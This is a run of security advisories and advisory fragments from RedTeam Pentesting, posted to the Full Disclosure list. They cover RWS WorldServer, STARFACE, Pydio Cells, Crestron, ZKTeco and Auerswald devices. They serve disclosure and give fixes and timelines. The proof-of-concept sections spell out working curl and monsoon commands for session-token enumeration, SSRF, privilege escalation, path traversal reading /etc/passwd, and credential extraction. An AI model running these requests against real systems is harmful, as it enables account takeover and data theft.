[FD] [RT-SA-2023-001] Session Token Enumeration in RWS WorldServer
Advisory: Session Token Enumeration in RWS WorldServer Session tokens in RWS WorldServer have a low entropy and can be enumerated, leading to unauthorised access to user sessions. Details === Product: WorldServer Affected Versions: 11.7.3 and earlier versions Fixed Version: 11.8.0 Vulnerability Type: Session Token Enumeration Security Risk: high Vendor URL: https://www.rws.com/localization/products/additional-solutions/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001 Advisory Status: published CVE: CVE-2023-38357 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357 Introduction "WorldServer offers a flexible, enterprise-class translation management system that automates translation tasks and greatly reduces the cost of supporting large volumes of local language content." (from the vendor's homepage) More Details WorldServer associates user sessions with numerical tokens, which always are positive values below 2^31. The SOAP action "loginWithToken" allows for a high amount of parallel attempts to check if a token is valid. During analysis, many assigned tokens were found to be in the 7-digit range of values. An attacker is therefore able to enumerate user accounts in only a few hours. Proof of Concept In the following an example "loginWithToken" request is shown: --- POST /ws/services/WSContext HTTP/1.1 Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 501 Host: www.example.com Connection: close User-Agent: agent http://www.w3.org/2001/XMLSchema-instance"; xmlns:xsd="http://www.w3.org/2001/XMLSchema"; xmlns:soapenv="http://schemas.xmlsoap.org";> http://schemas.xmlsoap.org/soap/encoding/";> FUZZ --- It can be saved as file "login-soap.req" and be used as a request template for the command-line HTTP enumerator monsoon [1] to achieve many parallel requests: --- $ monsoon fuzz --threads 100 \ --template-file login-soap.req \ --range 1-2147483647 \ --hide-pattern "InvalidSessionException" \ 'https://www.example.com' Target URL: https://www.example.com/ status header body valueextract 500 191 560 5829099 500 191 556 6229259 200 191 3702 7545136 500 191 556 9054984 [...] processed 1200 HTTP requests in 2h38m38s 4 of 1200 requests shown, 1225 req/s --- The --range parameter reflects the possible value range of 2^31 and for each value an HTTP request is sent to the WorldServer SOAP API where the FUZZ marker in the request template is replaced with the respective value. Also responses are hidden which contain "InvalidSessionException" as these sessions are invalid. Responses will yield a status code of 200 if an administrative session token is found. For an unprivileged user session, status code 500 is returned. Workaround == Lower the rate at which requests can be issued, for example with a frontend proxy. Fix === According to the vendor, upgrading to versions above 11.8.0 resolves the vulnerability. Security Risk = Attackers can efficiently enumerate session tokens. In a penetration test, it was possible to get access to multiple user accounts, including administrative accounts using this method in under three hours. Additionally, by using such an administrative account it seems likely to be possible to execute arbitrary code on the underlying server by customising the REST API [2]. Thus, the vulnerability poses a high risk. Timeline 2023-03-27 Vulnerability identified 2023-03-30 Customer approved disclosure to vendor 2023-04-03 Requested security contact from vendor 2023-04-06 Vendor responded with security contact 2023-04-14 Advisory sent to vendor 2023-04-18 Vendor confirms vulnerability and states that it was already known and fixed in version 11.8.0. 2023-07-03 Customer confirms update to fixed version 2023-07-05 CVE ID requested 2023-07-15 CVE ID assigned 2023-07-19 Advisory released References == [1] https://github.com/RedTeamPentesting/monsoon [2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to sha
[FD] [RT-SA-2022-004] STARFACE: Authentication with Password Hash Possible
vulnerability was addressed with a temporary solution, such that the password hashes are encrypted before they are saved in the database. This approach prevents attackers from exploiting this vulnerability in scenarios where they have only acquired pure database access. However, attackers with system level access can bypass this temporary measure as they can extract the encryption key and decrypt the hashes in the database. A solution that fixes this vulnerability entirely is still in progress. Security Risk = The web interface and REST API of STARFACE allow to login using the password hash instead of the cleartext password. This can be exploited by attackers who gained access to the application's database where the passwords are also saved as a SHA512 hash of the cleartext passwords. While the precondition for this attack could be the full compromise of the STARFACE PBX, another attack scenario could be that attackers acquire access to backups of the database stored on another system. Furthermore, the login via password hash allows attackers for permanent unauthorised access to the web interface even if system access was obtained only temporarily. Due to the prerequisites of obtaining access to password hashes, the vulnerability poses a low risk only. Timeline 2022-12-06 Vulnerability identified 2022-12-13 Customer approved disclosure to vendor 2023-01-11 Vendor notified 2023-05-04 Vendor released new version 8.0.0.11 2023-05-19 CVE ID requested 2023-05-20 CVE ID assigned 2023-06-01 Advisory released References == [0] https://starface.com/en/products/comfortphoning/ [1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] [RT-SA-2023-005] Pydio Cells: Server-Side Request Forgery
For longer running processes, Pydio Cells allows for the creation of jobs, which are run in the background. The job "remote-download" can be used to cause the backend to send a HTTP GET request to a specified URL and save the response to a new file. The response file is then available in a user-specified folder in Pydio Cells. Details === Product: Pydio Cells Affected Versions: 4.1.2 and earlier versions Fixed Versions: 4.2.0, 4.1.3, 3.0.12 Vulnerability Type: Server-Side Request Forgery Security Risk: medium Vendor URL: https://pydio.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005 Advisory Status: published CVE: CVE-2023-32750 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750 Introduction "Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues." (from the vendor's homepage) More Details Using the REST-API of Pydio Cells it is possible to start jobs. For example, when renaming a file or folder an HTTP request similar to the following is sent: PUT /a/jobs/user/move HTTP/2 Host: example.com User-Agent: agent Accept: application/json Authorization: Bearer G4ZRN[...] Content-Type: application/json Content-Length: 140 { "JobName": "move", "JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}" } The body contains a JSON object with a job name and additional parameters for the job. Besides the "move" job, also a job with the name "remote-download" exists. It takes two additional parameters: "urls" and "target". In the "urls" parameter, a list of URLs can be specified and in the parameter "target" a path can be specified in which to save the response. When the job is started, HTTP GET requests are sent from the Pydio Cells server to the specified URLs. The responses are saved into a file, which are uploaded to the specified folder within Pydio Cells. Potential errors are transmitted in a WebSocket channel, which can be opened through the "/ws/event" endpoint. Proof of Concept Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then, run the following commands to start a "remote-download" job to trigger an HTTP request: $ export JWT="" $ echo '{"urls": ["http://localhost:8000/internal.html";], "target": "personal-files"}' \ | jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \ | tee remote-download.json $ curl --header "Authorization: Bearer $JWT" \ --header 'Content-Type: application/json' \ --request PUT \ --data @remote-download.json 'https://example.com/a/jobs/user/remote-download' The URL in the JSON document specifies which URL to request. The "target" field in the same document specifies into which folder the response is saved. Afterwards, the response is contained in a file in the specified folder. Potential errors are communicated through the WebSocket channel. Workaround == Limit the services which can be reached by the Pydio Cells server, for example using an outbound firewall. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk = The risk is highly dependent on the environment in which the attacked Pydio Cells instance runs. If there are any internal HTTP services which expose sensitive data on the same machine or within the same network, the server-side request forgery vulnerability could pose a significant risk. In other circumstances, the risk could be negligible. Therefore, overall the vulnerability is rated as a medium risk. Timeline 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References == RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and
[FD] [RT-SA-2023-004] Pydio Cells: Cross-Site Scripting via File Download
xss/xss.html"); The code has to be run in context of Pydio Cells while being logged in. If the resulting URL is opened in a browser, the JavaScript code contained in the HTML file is run. If the attack is conducted in the described way, the JWT of the attacker is exposed through the URL. However, this can be circumvented by first generating a public URL for the file and then constructing the presigned URL based on the resulting download URL. Workaround == No workaround known. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk = Attackers that can upload files to a Pydio Cells instance can construct URLs that execute arbitrary JavaScript code in context of Pydio Cells upon opening. This could for example be used to steal the authentication tokens of users opening the URL. It is likely that such an attack succeeds, since sharing URLs to files hosted using Pydio Cells is a common use case of the application. Therefore, the vulnerability is estimated to pose a high risk. Timeline 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References == [1] https://aws.amazon.com/sdk-for-javascript/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] [RT-SA-2023-003] Pydio Cells: Unauthorised Role Assignments
ot;foobar", "Password": "hunter2", "Attributes": {"profile": "shared"}, "Roles": .}' \ | tee create_user.json { "Login": "foobar", "Password": "hunter2", "Attributes": { "profile": "shared" }, "Roles": [...] } Finally, the following curl command can be issued to create the new external user: $ curl --request PUT \ --silent \ --header "Authorization: Bearer $JWT" \ --header 'Content-Type: application/json' \ --data @create_user.json \ https://example.com/a/user/foobar Now, login with the newly created user to access all cells and non-personal workspaces. Workaround == Disallow the creation of external users in the authentication settings. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk = Attackers with access to any regular user account for a Pydio Cells instance can extend their privileges by creating a new external user with all roles assigned. Subsequently, they can access all folders and files in any cell and workspace, except for personal workspaces. The creation of external users is activated by default. Therefore, the vulnerability is estimated to pose a high risk. Timeline 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References == [1] https://curl.se/ [2] https://stedolan.github.io/jq/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] [RT-SA-2022-002] Skyhigh Security Secure Web Gateway: Cross-Site Scripting in Single Sign-On Plugin
As mentioned above, the HTTP response body could also include JavaScript code designed to interact with the domain specified in the URL resulting in a cross-site scripting vulnerability. Workaround == None. Fix === According to the vendor, the vulnerability is mitigated in versions 10.2.17, 11.2.6 and 12.0.1 of the Secure Web Gateway. This was not verified by RedTeam Pentesting GmbH. The vendor's security bulletin can be found at the following URL: https://kcm.trellix.com/corporate/index?page=content&id=SB10393 Security Risk = The vulnerability could be used to perform cross-site scripting attacks against users of the SWG in context of any domain. Attackers only need to convince users to open a prepared URL or visit an attacker's website that could perform an automatic redirect to an exploit URL. This exposes any website visited through the SWG to the various risks and consequences of a cross-site scripting vulnerability such as account takeover. As a result, this vulnerability poses a high risk. Timeline ==== 2022-07-29 Vulnerability identified 2022-10-20 Customer approved disclosure to vendor 2022-10-20 Vulnerability was disclosed to the vendor 2023-01-17 Patch released by vendor for versions 10.2.17, 11.2.6 and 12.0.1. 2023-01-26 Detailed advisory released by RedTeam Pentesting GmbH RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] [RT-SA-2021-003] Missing Authentication in ZKTeco ZEM/ZMM Web Interface
r-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/extlog.dat rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/extuser.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/group.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/htimezone.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/lockgroup.dat rwxr-xr-x root/root 54800 2021-06-23 09:55 mnt/mtdblock/data/oplog.dat rwxr-xr-x root/root 33200 2021-06-23 07:23 mnt/mtdblock/data/sms.dat rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/ssrattlog.dat rwxr-xr-x root/root660 2018-11-09 17:28 mnt/mtdblock/data/stkey.dat rwxrwxrwx 500/5130 2013-05-04 01:28 mnt/mtdblock/data/template.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/timezone.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/transaction.dat rwxr-xr-x root/root952 2021-06-23 07:24 mnt/mtdblock/data/udata.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/user.dat rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/wkcd.dat --- In this archive, the file "mnt/mtdblock/templatev10.dat" will likely contain fingerprints, and the file "mnt/mtdblock/ssruser.dat" contains the user database. The user database contains 72 byte user records, each containing the privilege level, the PIN, the name of the user, data stored on external authentication tokens like cards, and the group of the user. While the cookie value might be guessable, it is not used for authentication purposes. An attacker with knowledge of the corresponding URLs could access the user detail view or the backup without any authentication. Proof of Concept http://192.0.2.1/form/DataApp?style=1 http://192.0.2.1/form/DataApp?style=0 http://192.0.2.1/csl/user?did=0&uid=123 Workaround == Network access to the device should be limited to trustworthy persons. This might be hard to implement if the device is installed in a public space, especially if it is used for access control, too. Fix === Currently, it is not known whether a newer version might fix this issue. Due to the age of the product, the vendor might decide not to create a fix at all. Security Risk = Attackers with network access to a ZKTeco ZEM/ZMM time attendance device can get access to employee data, including the credentials used for accessing the time attendance device. If these credentials are used for other purposes than time attendance, such as physical access control, attackers might use them to gain access to protected areas. The actual risk estimate varies wildly with the kind of access control system in place and whether network access to the device is prevented by other means, such as nearby security guards. For this reason, missing authentication to the ZEM/ZMM web interface is estimated to pose a medium risk. This estimate might need to be adjusted to the specific use case of the device. Timeline 2021-06-24 Vulnerability identified 2021-07-12 Customer approved disclosure to vendor 2021-07-16 Vendor notified 2021-08-20 Vendor provides fixed firmware 2022-09-29 Customer approved release of advisory 2022-10-10 CVE ID requested 2022-10-15 CVE ID assigned 2022-10-24 Advisory published References == https://zkteco.eu/company/history RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] [RT-SA-2021-009] Credential Disclosure in Web Interface of Crestron Device
Advisory: Credential Disclosure in Web Interface of Crestron Device When the administrative web interface of the Crestron HDMI switcher is accessed unauthenticated, user credentials are disclosed which are valid to authenticate to the web interface. Details === Product: Crestron HD-MD4X2-4K-E Affected Versions: 1.0.0.2159 Fixed Versions: - Vulnerability Type: Information Disclosure Security Risk: high Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E Vendor Status: decided not to fix Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009 Advisory Status: published CVE: CVE-2022-23178 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178 Introduction "Crestron sets the gold standard for network security by leveraging the most advanced technologies including 802.1x authentication, AES encryption, Active Directory® credential management, JITC Certification, SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to provide network security at the product level." (from the vendor's homepage) More Details Upon visiting the device's web interface using a web browser, a login form is displayed requiring to enter username and password to authenticate. The analysis of sent HTTP traffic revealed that in addition to the loading of the website, a few more HTTP requests are automatically triggered. One of the associated responses contains a username and a password which can be used to authenticate as the affected user. Proof of Concept Requesting the URL "http://crestron.example.com/"; via a web browser results in multiple HTTP requests being sent. Among others, the following URL is requested: http://crestron.example.com/aj.html?a=devi&_=[...] This request results in a response similar to the following: HTTP/1.0 200 OK Cache-Control: no-cache Content-type: text/html { "login_ur": 0, "front_val": [ 0, 1 ], "uname": "admin", "upassword": "password" } The values for the keys "uname" and "upassword" could be used to successfully authenticate to the web interface as the affected user. Workaround == Reachability over the network can be restricted for access to the web interface, for example by using a firewall. Fix === No fix known. Security Risk = As user credentials are disclosed to visitors of the web interface they can directly be used to authenticate to it. The access allows to modify the device's input and output settings as well as to upload and install new firmware. Due to ease of exploitation and gain of administrative access this vulnerability poses a high risk. Timeline 2021-10-06 Vulnerability identified 2021-11-15 Customer approved disclosure to vendor 2021-12-08 Vendor notified 2021-12-15 Vendor notified again 2021-12-21 Vendor response received: "The device in question doesn't support Crestron's security practices. We recommend the HD-MD-4KZ alternative." 2021-12-22 Requested confirmation, that the vulnerability will not be addressed. 2021-12-28 Vendor confirms that the vulnerability will not be corrected. 2022-01-12 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2021-007] Auerswald COMpact Multiple Backdoors
HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] {"logstatus":"Administrator"} Workaround == Disable or restrict access to the web-based management interface if possible. Fix === Upgrade to a firmware version which corrects this vulnerability. Security Risk = By inspecting the firmware for the COMpact 5500R PBX, attackers can easily discover two backdoor passwords. One password is for the secret user account with the username "Schandelah", the other works as an alternative password for the user "Admin". Using the backdoor, attackers are granted access to the PBX with the highest privileges, enabling them to completely compromise the device. The passwords are derived from the serial number, the current date and the configured language. The backdoor passwords are not documented. They secretly coexist with a documented password recovery function supported by the vendor. No way was found to disable the backdoor access. All information needed to derive the passwords can be requested over the network without authentication, so attackers only require network access to the web-based management interface. Due to the ease of exploitation and severe consequences, the backdoor passwords are rated as a high risk. Timeline 2021-08-26 Vulnerability identified 2021-09-01 Customer approved disclosure to vendor 2021-09-10 Vendor notified 2021-09-10 CVE ID requested 2021-09-10 CVE ID assigned 2021-10-05 Vendor provides access to device with fixed firmware 2021-10-11 Vendor provides fixed firmware 2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected 2021-12-06 Advisory published References == [1] https://www.auerswald.de/de/support/download/firmware-compact-5500 [2] https://www.denx.de/wiki/U-Boot [3] https://www.lighttpd.net [4] https://ghidra-sre.org RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2021-006] Auerswald COMpact Arbitrary File Disclosure
- $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \ 'https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424' HTTP/1.1 200 OK X-XSS-Protection: 1 Content-Type: image/jpg; charset=UTF-8 Content-Length: 13986 Content-disposition: attachment; filename="logo1.jpg" [...] In a similar fashion as before, the file "/etc/passwd" can be accessed: $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \ 'https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd' HTTP/1.1 200 OK [...] root::0:0:root:/root:/bin/sh netstorage::1:1::/data/ftpd:/bin/false web::2:2::/opt/auerswald/lighttpd:/bin/false For attackers, an interesting file is the SQLite[2] database file "/data/db/pbx4.db". It can be downloaded as follows: $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\ '192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db' \ > pbx4.db % Total% Received % Xferd Average Speed TimeTime Time Current Dload Upload Total SpentLeft Speed 100 5120 100 51200 0 16253 0 --:--:-- --:--:-- --:--:-- 16305 This file contains the password for the highly privileged "Admin" user account: $ sqlite3 pbx4.db SQLite version 3.27.2 2019-02-25 16:06:06 Enter ".help" for usage hints. sqlite> .tables DbFileVersion PbxMisc sqlite> select * from PbxMisc; [...] AdminPasswdHash| AdminLogin|Admin AdminPin|43214321 AdminPasswd|S3kr1t! The username and password can then be used to log into the web application: $ curl --user 'Admin:S3kr1t!' --anyauth --include \ https://192.168.1.2/tree HTTP/1.1 200 OK Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/ [...] [{"login":3,"userId":0,"userName":"",[...]}] Checking the access level reveals the new privilege: $ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \ https://192.168.1.2/logstatus_state HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] {"logstatus":"Administrator"} The user "Admin", in contrast to regular administrative users ("sub-admin"), can access more functions and for example apply firmware updates. Workaround == Disable or restrict access to the web-based management if possible. Fix === Upgrade to a firmware version which corrects this vulnerability. Security Risk = Attackers who already have acquired administrative access as a so-called "sub-admin" can download a database file and access the password for the highly privileged "Admin" account. This account can use more functions and is allowed to apply firmware updates. On the one hand, exploiting this vulnerability already requires administrative access. On the other hand, attackers can reach high-privileged access to the PBX and use functions not available to "sub-admin" users, like firmware updates. All in all, this vulnerability is therefore rated to have a medium risk potential. Timeline 2021-08-26 Vulnerability identified 2021-09-01 Customer approved disclosure to vendor 2021-09-10 Vendor notified 2021-09-10 CVE ID requested 2021-09-10 CVE ID assigned 2021-10-05 Vendor provides access to device with fixed firmware 2021-10-11 Vendor provides fixed firmware 2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected 2021-12-06 Advisory published References == [1] https://curl.se [2] https://www.sqlite.org RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The re
[FD] [RT-SA-2021-005] Auerswald COMpact Privilege Escalation
QBGDRFJB' --include \ 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234' HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] {"rufnr":"123","name":"Example User",[...], "privatPin":"XX","privatPass":"XX","privatToken":"XX", [...], "isSubadmin":0,[...]} In the returned JSON document, the values of the fields for the PIN, token and password are replaced by "XXX". But if the URL parameter "passwd" is set to the value 1, the values are returned in plain text: $ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \ 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234&passwd=1' HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] {"rufnr":"123","name":"Example User",[...], "privatPin":"12345678","privatPass":"secretpassword", "privatToken":"y",[...], "isSubadmin":0,[...]} This can be repeated for other user accounts, for example for the user account with the ID shown it the listing earlier. The server returns the plain text password for the other user account: $ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \ 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=&passwd=1 HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] {"rufnr":"555","name":"sub-admin other user","privatPin":"", "privatPass":"verysecretpassword","privatToken":"zz", [...],"isSubadmin":1,[...]} The password can then be used to log into the PBX with the other user account: $ curl --anyauth --user sub-admin:verysecretpassword --include \ https://192.168.1.2/tree [...] HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/ [...] [{"login":2,"userId":,[...]}] Checking the access level with the new session ID shows that the user is now logged in with an administrative account: $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \ https://192.168.1.2/logstatus_state HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] {"logstatus":"Sub-Administrator"}% Workaround == Disable or restrict access to the web-based management interface if possible. Fix === Upgrade to a firmware version which corrects this vulnerability. Security Risk = Attackers who have acquired access to a low-privileged user account, for example by extracting such an account from a VoIP phone, can log into the web-based management interface of the COMpact 5500R PBX and access clear text passwords for other user accounts, including those with the "sub-admin" privilege. After logging in with these newly acquired credentials, attackers can access configuration settings and most other functions. They can then for example create new SIP credentials and use them to call premium rate phone lines they operate to generate revenue. They can monitor and even redirect all incoming and outgoing phone calls and record all Ethernet data traffic. Due to the severe and far-reaching consequences and despite the prerequisite of having to know an existing low-privilege user account, this vulnerability rated as a high risk. Timeline 2021-08-26 Vulnerability identified 2021-09-01 Customer approved disclosure to vendor 2021-09-10 Vendor notified 2021-09-10 CVE ID requested 2021-09-10 CVE ID assigned 2021-10-05 Vendor provides access to device with fixed firmware 2021-10-11 Vendor provides fixed firmware 2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected 2021-12-06 Advisory published References == [1] https://curl.se/ 